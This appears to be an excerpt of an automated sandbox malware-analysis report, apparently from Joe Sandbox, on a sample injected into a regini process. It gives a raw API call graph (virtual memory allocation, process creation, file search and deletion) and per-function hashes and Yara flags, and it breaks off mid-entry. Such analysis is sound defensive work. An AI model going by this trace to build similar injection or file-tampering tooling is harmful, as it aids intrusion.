79572->79574 79609 28ca2e0 79572->79609 79575 28caefa 79574->79575 79618 28ca650 79574->79618 79577 28db7e0 RtlFreeHeap 79575->79577 79578 28caf01 79577->79578 79578->79562 79580 28ca8a6 79579->79580 79583 28ca8b1 79579->79583 79581 28db8c0 RtlAllocateHeap 79580->79581 79580->79583 79581->79583 79582 28ca8d8 79582->79564 79583->79582 79584 28c8520 GetFileAttributesW 79583->79584 79585 28cabf2 79583->79585 79588 28ca2e0 RtlFreeHeap 79583->79588 79589 28ca650 RtlFreeHeap 79583->79589 79584->79583 79586 28cac0b 79585->79586 79587 28db7e0 RtlFreeHeap 79585->79587 79586->79564 79587->79586 79588->79583 79589->79583 79591 28c8541 79590->79591 79592 28c8553 79591->79592 79593 28c8548 GetFileAttributesW 79591->79593 79592->79569 79594 28d3540 79592->79594 79593->79592 79595 28d354e 79594->79595 79596 28d3555 79594->79596 79595->79572 79597 28c46e0 2 API calls 79596->79597 79598 28d358a 79597->79598 79599 28d3599 79598->79599 79622 28d3000 LdrLoadDll LdrLoadDll 79598->79622 79601 28db8c0 RtlAllocateHeap 79599->79601 79605 28d3744 79599->79605 79602 28d35b2 79601->79602 79603 28d373a 79602->79603 79602->79605 79606 28d35ce 79602->79606 79604 28db7e0 RtlFreeHeap 79603->79604 79603->79605 79604->79605 79605->79572 79606->79605 79607 28db7e0 RtlFreeHeap 79606->79607 79608 28d372e 79607->79608 79608->79572 79610 28ca306 79609->79610 79623 28cdd20 79610->79623 79612 28ca378 79614 28ca396 79612->79614 79615 28ca500 79612->79615 79613 28ca4e5 79613->79572 79614->79613 79628 28ca1a0 79614->79628 79615->79613 79616 28ca1a0 RtlFreeHeap 79615->79616 79616->79615 79619 28ca676 79618->79619 79620 28cdd20 RtlFreeHeap 79619->79620 79621 28ca6fd 79620->79621 79621->79574 79622->79599 79625 28cdd44 79623->79625 79624 28cdd51 79624->79612 79625->79624 79626 28db7e0 RtlFreeHeap 79625->79626 79627 28cdd94 79626->79627 79627->79612 79629 28ca1bd 79628->79629 79632 28cddb0 79629->79632 79631 28ca2c3 79631->79614 79633 28cddd4 79632->79633 79634 28cde7e 79633->79634 79635 28db7e0 RtlFreeHeap 79633->79635 79634->79631 79635->79634 79641 28db4d0 79642 28db4db 79641->79642 79644 28db4fa 79642->79644 79645 28d5ce0 79642->79645 79646 28d5d42 79645->79646 79648 28d5d4f 79646->79648 79649 28c2490 79646->79649 79648->79644 79650 28c2436 79649->79650 79650->79649 79651 28d8cf0 LdrInitializeThunk 79650->79651 79652 28c24c0 79650->79652 79653 28c2466 79651->79653 79656 28d9770 79653->79656 79655 28c247b 79655->79648 79657 28d9802 79656->79657 79659 28d979e 79656->79659 79661 3072e80 LdrInitializeThunk 79657->79661 79658 28d9833 79658->79655 79659->79655 79661->79658 79662 28d6f50 79663 28d6fb4 79662->79663 79664 28d6fdf 79663->79664 79667 28d0c70 79663->79667 79666 28d6fc1 79668 28d0c89 79667->79668 79670 28d0a20 79667->79670 79668->79666 79669 28d0c5c 79669->79666 79670->79669 79671 28c6570 LdrInitializeThunk 79670->79671 79672 28d9170 LdrInitializeThunk 79670->79672 79673 28d96d0 NtClose 79670->79673 79671->79670 79672->79670 79673->79670 79674 28c3293 79675 28c7f30 2 API calls 79674->79675 79676 28c32a3 79675->79676 79677 28c32bf 79676->79677 79678 28d96d0 NtClose 79676->79678 79678->79677 79679 28c5dd3 79680 28c5d5f 79679->79680 79681 28c5ddf 79679->79681 79682 28c82b0 LdrInitializeThunk 79680->79682 79683 28c5d80 79682->79683 79685 28c5dca 79683->79685 79686 28c5dac 79683->79686 79687 28c8230 79683->79687 79688 28c8274 79687->79688 79689 28c8295 79688->79689 79694 28d89c0 79688->79694 79689->79683 79691 28c8285 79692 28c82a1 79691->79692 79693 28d96d0 NtClose 79691->79693 79692->79683 79693->79689 79695 28d8a3d 79694->79695 79696 28d89eb 79694->79696 79699 3074650 LdrInitializeThunk 79695->79699 79696->79691 79697 28d8a62 79697->79691 79699->79697 79702 28bb6a0 79703 28bcd11 79702->79703 79704 28db750 NtAllocateVirtualMemory 79702->79704 79704->79703 79705 28cfa20 79706 28cfa84 79705->79706 79707 28c6460 2 API calls 79706->79707 79709 28cfbb7 79707->79709 79708 28cfbbe 79709->79708 79734 28c6570 79709->79734 79711 28cfd63 79712 28cfc3a 79712->79711 79713 28cfd72 79712->79713 79738 28cf800 79712->79738 79714 28d96d0 NtClose 79713->79714 79716 28cfd7c 79714->79716 79717 28cfc76 79717->79713 79718 28cfc81 79717->79718 79719 28db8c0 RtlAllocateHeap 79718->79719 79720 28cfcaa 79719->79720 79721 28cfcc9 79720->79721 79722 28cfcb3 79720->79722 79747 28cf6f0 CoInitialize 79721->79747 79724 28d96d0 NtClose 79722->79724 79726 28cfcbd 79724->79726 79725 28cfcd7 79750 28d9170 79725->79750 79728 28cfd52 79729 28d96d0 NtClose 79728->79729 79730 28cfd5c 79729->79730 79731 28db7e0 RtlFreeHeap 79730->79731 79731->79711 79732 28cfcf5 79732->79728 79733 28d9170 LdrInitializeThunk 79732->79733 79733->79732 79735 28c6595 79734->79735 79754 28d9010 79735->79754 79739 28cf81c 79738->79739 79740 28c46e0 2 API calls 79739->79740 79742 28cf83a 79740->79742 79741 28cf843 79741->79717 79742->79741 79743 28c46e0 2 API calls 79742->79743 79744 28cf90e 79743->79744 79745 28c46e0 2 API calls 79744->79745 79746 28cf968 79744->79746 79745->79746 79746->79717 79748 28cf755 79747->79748 79749 28cf7eb CoUninitialize 79748->79749 79749->79725 79751 28d918d 79750->79751 79759 3072ba0 LdrInitializeThunk 79751->79759 79752 28d91bd 79752->79732 79755 28d902d 79754->79755 79758 3072c60 LdrInitializeThunk 79755->79758 79756 28c6609 79756->79712 79758->79756 79759->79752 79760 28d8ca0 79761 28d8cbd 79760->79761 79764 3072df0 LdrInitializeThunk 79761->79764 79762 28d8ce5 79764->79762 79765 28dc8e0 79766 28db7e0 RtlFreeHeap 79765->79766 79767 28dc8f5 79766->79767 79768 28d9620 79769 28d969a 79768->79769 79771 28d964e 79768->79771 79770 28d96b0 NtDeleteFile 79769->79770 79772 28d6260 79773 28d62ba 79772->79773 79775 28d62c7 79773->79775 79776 28d3c70 79773->79776 79777 28db750 NtAllocateVirtualMemory 79776->79777 79778 28d3cb1 79777->79778 79779 28c46e0 2 API calls 79778->79779 79782 28d3dbe 79778->79782 79780 28d3cf7 79779->79780 79781 28d3d40 Sleep 79780->79781 79780->79782 79781->79780 79782->79775 79783 28d0320 79784 28d033d 79783->79784 79785 28c46e0 2 API calls 79784->79785 79786 28d035b 79785->79786 79787 28d1960 79788 28d197c 79787->79788 79789 28d19b8 79788->79789 79790 28d19a4 79788->79790 79791 28d96d0 NtClose 79789->79791 79792 28d96d0 NtClose 79790->79792 79793 28d19c1 79791->79793 79794 28d19ad 79792->79794 79797 28db900 RtlAllocateHeap 79793->79797 79796 28d19cc 79797->79796 79798 28d9520 79799 28d95ca 79798->79799 79801 28d954e 79798->79801 79800 28d95e0 NtReadFile 79799->79800 79802 28d8b20 79803 28d8baf 79802->79803 79804 28d8b4b 79802->79804 79807 3072ee0 LdrInitializeThunk 79803->79807 79805 28d8be0 79807->79805 79809 28b9eb0 79810 28b9ebf 79809->79810 79811 28b9f00 79810->79811 79812 28b9eed CreateThread 79810->79812 79813 28c74b0 79814 28c74c8 79813->79814 79816 28c7522 79813->79816 79814->79816 79817 28cb440 79814->79817 79818 28cb466 79817->79818 79819 28cb69c 79818->79819 79844 28d9af0 79818->79844 79819->79816 79821 28cb4e2 79821->79819 79822 28dc9b0 2 API calls 79821->79822 79823 28cb4fe 79822->79823 79823->79819 79824 28cb5d5 79823->79824 79825 28d8cf0 LdrInitializeThunk 79823->79825 79826 28c5cd0 LdrInitializeThunk 79824->79826 79828 28cb5f4 79824->79828 79827 28cb560 79825->79827 79826->79828 79827->79824 79831 28cb569 79827->79831 79832 28cb684 79828->79832 79851 28d8860 79828->79851 79829 28cb5bd 79833 28c82b0 LdrInitializeThunk 79829->79833 79830 28cb59b 79866 28d4970 LdrInitializeThunk 79830->79866 79831->79819 79831->79829 79831->79830 79847 28c5cd0 79831->79847 79838 28c82b0 LdrInitializeThunk 79832->79838 79837 28cb5cb 79833->79837 79837->79816 79839 28cb692 79838->79839 79839->79816 79840 28cb65b 79856 28d8910 79840->79856 79842 28cb675 79861 28d8a70 79842->79861 79845 28d9b0a 79844->79845 79846 28d9b1b CreateProcessInternalW 79845->79846 79846->79821 79848 28c5cdf 79847->79848 79867 28d8ec0 79848->79867 79850 28c5d0e 79850->79830 79852 28d88e0 79851->79852 79853 28d888e 79851->79853 79873 30739b0 LdrInitializeThunk 79852->79873 79853->79840 79854 28d8905 79854->79840 79857 28d898d 79856->79857 79858 28d893b 79856->79858 79874 3074340 LdrInitializeThunk 79857->79874 79858->79842 79859 28d89b2 79859->79842 79862 28d8af0 79861->79862 79864 28d8a9e 79861->79864 79875 3072fb0 LdrInitializeThunk 79862->79875 79863 28d8b15 79863->79832 79864->79832 79866->79829 79868 28d8f74 79867->79868 79870 28d8ef2 79867->79870 79872 3072d10 LdrInitializeThunk 79868->79872 79869 28d8fb9 79869->79850 79870->79850 79872->79869 79873->79854 79874->79859 79875->79863 79876 28cc7b0 79878 28cc7d9 79876->79878 79877 28cc8dd 79878->79877 79879 28cc883 FindFirstFileW 79878->79879 79879->79877 79881 28cc89e 79879->79881 79880 28cc8c4 FindNextFileW 79880->79881 79882 28cc8d6 FindClose 79880->79882 79881->79880 79882->79877 79883 28c6f30 79884 28c6f5a 79883->79884 79887 28c80e0 79884->79887 79886 28c6f84 79888 28c80fd 79887->79888 79894 28d8de0 79888->79894 79890 28c814d 79891 28c8154 79890->79891 79892 28d8ec0 LdrInitializeThunk 79890->79892 79891->79886 79893 28c817d 79892->79893 79893->79886 79895 28d8e7e 79894->79895 79896 28d8e0e 79894->79896 79899 3072f30 LdrInitializeThunk 79895->79899 79896->79890 79897 28d8eb7 79897->79890 79899->79897 79900 28c0f30 79901 28c0f4a 79900->79901 79902 28c46e0 2 API calls 79901->79902 79903 28c0f68 79901->79903 79902->79903 79904 28c0f9c PostThreadMessageW 79903->79904 79905 28c0fad 79903->79905 79904->79905 79906 28d1cf0 79907 28d1d09 79906->79907 79908 28d1d54 79907->79908 79911 28d1d94 79907->79911 79913 28d1d99 79907->79913 79909 28db7e0 RtlFreeHeap 79908->79909 79910 28d1d64 79909->79910 79912 28db7e0 RtlFreeHeap 79911->79912 79912->79913 79914 28d93b0 79915 28d946a 79914->79915 79916 28d93e2 79914->79916 79917 28d9480 NtCreateFile 79915->79917

                                                                              Executed Functions

                                                                              Function 028B9F10 Relevance: 27.9, Strings: 22, Instructions: 363COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 29 28b9f10-28ba1c0 30 28ba1ca-28ba1da 29->30 30->30 31 28ba1dc-28ba1f4 30->31 32 28ba205-28ba20f 31->32 33 28ba263-28ba26d 32->33 34 28ba211-28ba261 32->34 35 28ba27e-28ba28a 33->35 34->32 37 28ba29d-28ba2b6 35->37 38 28ba28c-28ba29b 35->38 37->37 40 28ba2b8-28ba2d1 37->40 38->35 40->40 41 28ba2d3-28ba2da 40->41 42 28ba2ff-28ba310 41->42 43 28ba2dc-28ba2f2 41->43 46 28ba321-28ba32d 42->46 44 28ba2fd 43->44 45 28ba2f4-28ba2fa 43->45 44->41 45->44 47 28ba32f-28ba33e 46->47 48 28ba340-28ba347 46->48 47->46 50 28ba379-28ba382 48->50 51 28ba349-28ba377 48->51 52 28ba51a-28ba524 50->52 53 28ba388-28ba39b 50->53 51->48 55 28ba535-28ba53e 52->55 54 28ba3ac-28ba3b8 53->54 56 28ba3ba-28ba3cd 54->56 57 28ba3cf-28ba3de 54->57 58 28ba54e-28ba558 55->58 59 28ba540-28ba54c 55->59 56->54 60 28ba44a-28ba454 57->60 61 28ba3e0-28ba3ec 57->61 63 28ba569-28ba572 58->63 59->55 69 28ba465-28ba471 60->69 67 28ba40b-28ba412 61->67 68 28ba3ee-28ba409 61->68 65 28ba585-28ba58c 63->65 66 28ba574-28ba583 63->66 70 28ba5bf-28ba5c9 65->70 71 28ba58e-28ba595 65->71 66->63 73 28ba445 67->73 74 28ba414-28ba443 67->74 68->61 75 28ba493-28ba49d 69->75 76 28ba473-28ba480 69->76 80 28ba5da-28ba5e6 70->80 78 28ba5ba call 28db440 71->78 79 28ba597-28ba5ad 71->79 73->52 74->67 77 28ba4ae-28ba4b7 75->77 81 28ba482-28ba48b 76->81 82 28ba491 76->82 84 28ba4b9-28ba4cc 77->84 85 28ba4ce-28ba4d4 77->85 78->70 86 28ba5b8 79->86 87 28ba5af-28ba5b5 79->87 89 28ba5e8-28ba5f4 80->89 90 28ba604-28ba60e 80->90 81->82 82->69 84->77 93 28ba4d8-28ba4e2 85->93 86->71 87->86 95 28ba602 89->95 96 28ba5f6-28ba5fc 89->96 91 28ba65a-28ba663 90->91 92 28ba610-28ba62f 90->92 97 28ba641-28ba652 92->97 98 28ba631-28ba63f 92->98 99 28ba515 93->99 100 28ba4e4-28ba503 93->100 95->80 96->95 102 28ba658 97->102 98->102 99->50 103 28ba513 100->103 104 28ba505-28ba50d 100->104 102->90 103->93 104->103
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: 1$1e$5$C$F$G$Gx$I^$Jv$V$Xg$]@$aY$c$e$l$oL$x2$z$D$X$}
                                                                              • API String ID: 0-2409101627
                                                                              • Opcode ID: dc9542034efb73785b3ef9ef1054dd012fcf2978995625c0d4a0e5f1355190ba
                                                                              • Instruction ID: 435b8bef44401753419f556a6b5706fb7f84b6f6a71863cc5e14a61639b722ea
                                                                              • Opcode Fuzzy Hash: dc9542034efb73785b3ef9ef1054dd012fcf2978995625c0d4a0e5f1355190ba
                                                                              • Instruction Fuzzy Hash: F1128DB8D05229CBDB69CF88C8947DDBBB2BF44308F1081DAC509AB340DB755A89CF55
                                                                              Function 028CC7B0 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindFirstFileW.KERNELBASE(?,00000000), ref: 028CC894
                                                                              • FindNextFileW.KERNELBASE(?,00000010), ref: 028CC8CF
                                                                              • FindClose.KERNELBASE(?), ref: 028CC8DA
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Find$File$CloseFirstNext
                                                                              • String ID:
                                                                              • API String ID: 3541575487-0
                                                                              • Opcode ID: 7e99e61d1f43b271cb12bed77c676ce7e10fe6c5edc95e166f12a7545896e1cf
                                                                              • Instruction ID: 7df93731b0e3e93082a7b63e416980a108e40b1b03ace0cdc5fe939d31f3347e
                                                                              • Opcode Fuzzy Hash: 7e99e61d1f43b271cb12bed77c676ce7e10fe6c5edc95e166f12a7545896e1cf
                                                                              • Instruction Fuzzy Hash: D1316E79A00208BBDB20DBA4CC85FEF777DEF44744F14449DB90DE6180D770AA848BA1
                                                                              Function 028D93B0 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtCreateFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?), ref: 028D94B1
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: bdc28f7b65c3cdd930017ff862381c90ad356ace6833aa718188b513bd1064a1
                                                                              • Instruction ID: 3c64eef4bb037b03f0bac3ae82675b7fb7016e1aeb7e86ac7733286fe6567557
                                                                              • Opcode Fuzzy Hash: bdc28f7b65c3cdd930017ff862381c90ad356ace6833aa718188b513bd1064a1
                                                                              • Instruction Fuzzy Hash: 0E31D6B9A01608AFCB14DF98D880EDE77F9EF8C314F108219F918A7340D730A9558FA5
                                                                              Function 028D9840 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(028C1F1E,?,028D819F,00000000,00000004,00003000,?,?,?,?,?,028D819F,028C1F1E,00000000,?,028D819F), ref: 028D990B
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: 20ee0b1367dbea7ab7f64ace039bf5eb32452cb9eb1f7f23a46f57acb9cb4484
                                                                              • Instruction ID: 9e08f8e585f7c533361c3054cb46b5d6e1a52139c0878a0b19effba3db06244b
                                                                              • Opcode Fuzzy Hash: 20ee0b1367dbea7ab7f64ace039bf5eb32452cb9eb1f7f23a46f57acb9cb4484
                                                                              • Instruction Fuzzy Hash: 2A212BB9A00209AFDB14DF98DC81EEFB7B9EF88310F108509FD18A7340D770A9158BA5
                                                                              Function 028D9620 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteFile
                                                                              • String ID:
                                                                              • API String ID: 4033686569-0
                                                                              • Opcode ID: abf5a842f463631de45dd5feb0bf890711c78a46f63e77bb229b6bfd9453d75b
                                                                              • Instruction ID: 3d4f058fbfb52ad8c8ef47a2c2c2d8dc219c9947058f6992e132fc0c73de0058
                                                                              • Opcode Fuzzy Hash: abf5a842f463631de45dd5feb0bf890711c78a46f63e77bb229b6bfd9453d75b
                                                                              • Instruction Fuzzy Hash: E711A37D6002047BD620EB68CC41FEB73ADDF85314F108549F918A7280D7707A068BA6
                                                                              Function 028D96D0 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 028D9704
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4815713074.00000000028B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 028B0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_28b0000_regini.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: 46584140032555b5b69e47656707a814a80bac78df92ade9faa821afa92411cb
                                                                              • Instruction ID: be3ae28071d0b44d3058f0c5f34637aa794a8ab11b0abbde8f71d209eeaf9ad1
                                                                              • Opcode Fuzzy Hash: 46584140032555b5b69e47656707a814a80bac78df92ade9faa821afa92411cb
                                                                              • Instruction Fuzzy Hash: CDE0463A2006047BC620EA59DC01F9B77ADDFC5714F108019FA1CAB280C671B9158AB5
                                                                              Function 03074340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 5aff11b2c8bfe41281b9b94079535e458086ec5ba879a78feb8cd395cf8a732d
                                                                              • Instruction ID: 01ba5f7c146adeb67287544d76bdd6a3efb55f0173ed54f7b3041f7c1017800d
                                                                              • Opcode Fuzzy Hash: 5aff11b2c8bfe41281b9b94079535e458086ec5ba879a78feb8cd395cf8a732d
                                                                              • Instruction Fuzzy Hash: EB90023160680412A140B25888C4586404697E0301B95C011E0824558C8B148A565361
                                                                              Function 03074650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 14ed5325b8dbeb6e0d777e801b34c7d60feed6bd491ab4d617d6089b64f3d88a
                                                                              • Instruction ID: 31c4487d3d9f160c0566974e884df66fb97e06aef162cd4979ea005641b483ea
                                                                              • Opcode Fuzzy Hash: 14ed5325b8dbeb6e0d777e801b34c7d60feed6bd491ab4d617d6089b64f3d88a
                                                                              • Instruction Fuzzy Hash: 3C900261602504425140B2588844446604697E13013D5C115A0954564C871889559269
                                                                              Function 030735C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 467e976f46e37073f495828fbb8c46a225d948725581b2d38fed6297dcbcc567
                                                                              • Instruction ID: 4fb367fa3e6d522a34980a98d149cddb88a1beb4535a50ecc5817c63b3a8f904
                                                                              • Opcode Fuzzy Hash: 467e976f46e37073f495828fbb8c46a225d948725581b2d38fed6297dcbcc567
                                                                              • Instruction Fuzzy Hash: BF90023160650802E100B2588554746104687D0301FA5C411A082456CD87958A5165A2
                                                                              Function 03072B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: c2864eb0aa40ae442fafd955dad36e1b12e8194d0df41917ff58320859b5bae4
                                                                              • Instruction ID: a2e36d66a1929a559374efda2c289cd63c9344a5a9e14ef8da73e41d35bde325
                                                                              • Opcode Fuzzy Hash: c2864eb0aa40ae442fafd955dad36e1b12e8194d0df41917ff58320859b5bae4
                                                                              • Instruction Fuzzy Hash: CC900261203404035105B2588454656404B87E0301B95C021E1414594DC62589916125
                                                                              Function 03072BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: fab693e33a595e6f9a93738cbed6d909b737bc8dc3323eaba215097a2c04f2e4
                                                                              • Instruction ID: ce895da96dbeacc49fe7a3c7f0bac4081e15daec10a300372ab21e5252573c09
                                                                              • Opcode Fuzzy Hash: fab693e33a595e6f9a93738cbed6d909b737bc8dc3323eaba215097a2c04f2e4
                                                                              • Instruction Fuzzy Hash: 4790023160640C02E150B2588454786004687D0301F95C011A0424658D87558B5576A1
                                                                              Function 03072BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 0ce42a06625f11c05117fce9047302c0c86125f4c55c9570ab75b2d8a553bcdc
                                                                              • Instruction ID: 255c6646a32e1e43b1bb9576642367f3a175ad6cd3d5e5a7799d590c98329b94
                                                                              • Opcode Fuzzy Hash: 0ce42a06625f11c05117fce9047302c0c86125f4c55c9570ab75b2d8a553bcdc
                                                                              • Instruction Fuzzy Hash: A290023120644C42E140B2588444A86005687D0305F95C011A0464698D97258E55B661
                                                                              Function 03072BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
                                                                              • Associated: 00000006.00000002.4817730430.0000000003129000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000312D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000006.00000002.4817730430.000000000319E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_6_2_3000000_regini.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: d2ecd73aa1907b577acb52217f195f2fd39b1b1382e17cea329659f9e51632c7
                                                                              • Instruction ID: 3c6f16fb4803e66306a919d02b0ed0964663dd0b229da0ff1e2f2945a35aba23
                                                                              • Opcode Fuzzy Hash: d2ecd73aa1907b577acb52217f195f2fd39b1b1382e17cea329659f9e51632c7
                                                                              • Instruction Fuzzy Hash: F390023120240C02E180B258844468A004687D1301FD5C015A0425658DCB158B5977A1
                                                                              Function 03072AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000006.00000002.4817730430.0000000003000000.00000040.00001000.00020000.00000000.sdmp, Offset: 03000000, based on PE: true
